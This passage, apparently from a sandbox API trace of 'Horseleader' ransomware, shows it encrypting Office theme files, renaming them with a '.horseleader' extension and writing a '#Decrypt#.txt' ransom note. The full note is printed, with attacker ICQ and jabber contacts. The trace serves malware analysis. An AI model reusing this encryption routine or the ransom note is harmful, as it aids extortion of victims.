Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.elm.horseleader")) returned 1 [0246.041] GetProcessHeap () returned 0x780000 [0246.041] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.041] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x5146e3d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x201, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ARCTIC.INF", cAlternateFileName="")) returned 1 [0246.041] lstrcmpiW (lpString1="ARCTIC.INF", lpString2="Windows") returned -1 [0246.042] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0246.042] StrStrIW (lpFirst="ARCTIC.INF", lpSrch=".horseleader") returned 0x0 [0246.042] lstrcmpW (lpString1="ARCTIC.INF", lpString2="#Decrypt#.txt") returned 1 [0246.042] lstrcmpW (lpString1="ARCTIC.INF", lpString2="_uninstalling_.png") returned 1 [0246.042] lstrlenW (lpString=".testttjffg") returned 11 [0246.042] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF", lpSrch=".testttjffg") returned 0x0 [0246.042] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.042] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.043] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF") returned 77 [0246.043] StrStrW (lpFirst="ARCTIC.INF", lpSrch=".txt") returned 0x0 [0246.043] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=513) returned 1 [0246.044] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x201, lpOverlapped=0x0) returned 1 [0246.045] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x201, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x201, lpOverlapped=0x0) returned 1 [0246.045] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.045] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.046] CloseHandle (hObject=0x1a4) returned 1 [0246.046] GetProcessHeap () returned 0x780000 [0246.046] RtlAllocateHeap 
(HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.046] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF.horseleader") returned 89 [0246.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\ARCTIC.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\arctic.inf.horseleader")) returned 1 [0246.052] GetProcessHeap () returned 0x780000 [0246.052] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.052] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0xba9, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.052] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.052] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0246.053] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.053] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.053] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.053] lstrlenW (lpString=".testttjffg") returned 11 
[0246.053] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.053] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.053] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.055] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF") returned 78 [0246.055] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.055] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=2985) returned 1 [0246.055] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xba9, lpOverlapped=0x0) returned 1 [0246.057] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff457, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.057] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xba9, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xba9, lpOverlapped=0x0) returned 1 [0246.058] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.058] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.058] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.058] CloseHandle (hObject=0x1a4) returned 1 [0246.058] GetProcessHeap () returned 0x780000 [0246.058] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.058] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.horseleader") returned 90 [0246.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\preview.gif.horseleader")) returned 1 [0246.060] GetProcessHeap () returned 0x780000 [0246.060] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.060] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x4d44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.060] lstrcmpiW 
(lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.060] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0246.060] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.060] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.060] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.060] lstrlenW (lpString=".testttjffg") returned 11 [0246.060] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.060] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.060] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG") returned 79 [0246.062] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.062] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=19780) returned 1 [0246.062] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4d44, lpOverlapped=0x0) returned 1 [0246.065] 
SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb2bc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.065] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4d44, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4d44, lpOverlapped=0x0) returned 1 [0246.065] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.066] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.066] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.066] CloseHandle (hObject=0x1a4) returned 1 [0246.066] GetProcessHeap () returned 0x780000 [0246.067] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.067] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.horseleader") returned 91 [0246.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\thmbnail.png.horseleader")) returned 1 [0246.068] GetProcessHeap () returned 0x780000 [0246.068] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: 
hHeap=0x780000) returned 1 [0246.068] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a79b700, ftCreationTime.dwHighDateTime=0x1c43125, ftLastAccessTime.dwLowDateTime=0x6d462ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8a79b700, ftLastWriteTime.dwHighDateTime=0x1c43125, nFileSizeHigh=0x0, nFileSizeLow=0x4d44, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.068] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.068] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\#Decrypt#.txt") returned 80 [0246.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.069] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0246.069] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.071] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.071] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.071] CloseHandle (hObject=0x158) returned 1 [0246.071] 
GetProcessHeap () returned 0x780000 [0246.071] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.071] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="AXIS", cAlternateFileName="")) returned 1 [0246.071] lstrcmpiW (lpString1="AXIS", lpString2="Windows") returned -1 [0246.072] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS") returned 64 [0246.072] lstrcmpW (lpString1="AXIS", lpString2=".") returned 1 [0246.072] lstrcmpW (lpString1="AXIS", lpString2="..") returned 1 [0246.072] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.072] GetProcessHeap () returned 0x780000 [0246.072] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.072] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*") returned 66 [0246.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.074] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.074] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\.") returned 66 [0246.074] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.074] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51767f50, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.074] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.074] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\..") returned 67 [0246.074] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.075] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.075] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd394600, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51767f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd394600, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x189be, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="AXIS.ELM", cAlternateFileName="")) returned 1 [0246.075] lstrcmpiW (lpString1="AXIS.ELM", lpString2="Windows") returned -1 [0246.075] wnsprintfW (in: 
pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0246.075] StrStrIW (lpFirst="AXIS.ELM", lpSrch=".horseleader") returned 0x0 [0246.075] lstrcmpW (lpString1="AXIS.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.075] lstrcmpW (lpString1="AXIS.ELM", lpString2="_uninstalling_.png") returned 1 [0246.075] lstrlenW (lpString=".testttjffg") returned 11 [0246.075] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM", lpSrch=".testttjffg") returned 0x0 [0246.075] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.075] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\axis.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.076] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\AXIS.ELM") returned 73 [0246.076] StrStrW (lpFirst="AXIS.ELM", lpSrch=".txt") returned 0x0 [0246.076] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=100798) returned 1 [0246.076] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.076] ReadFile 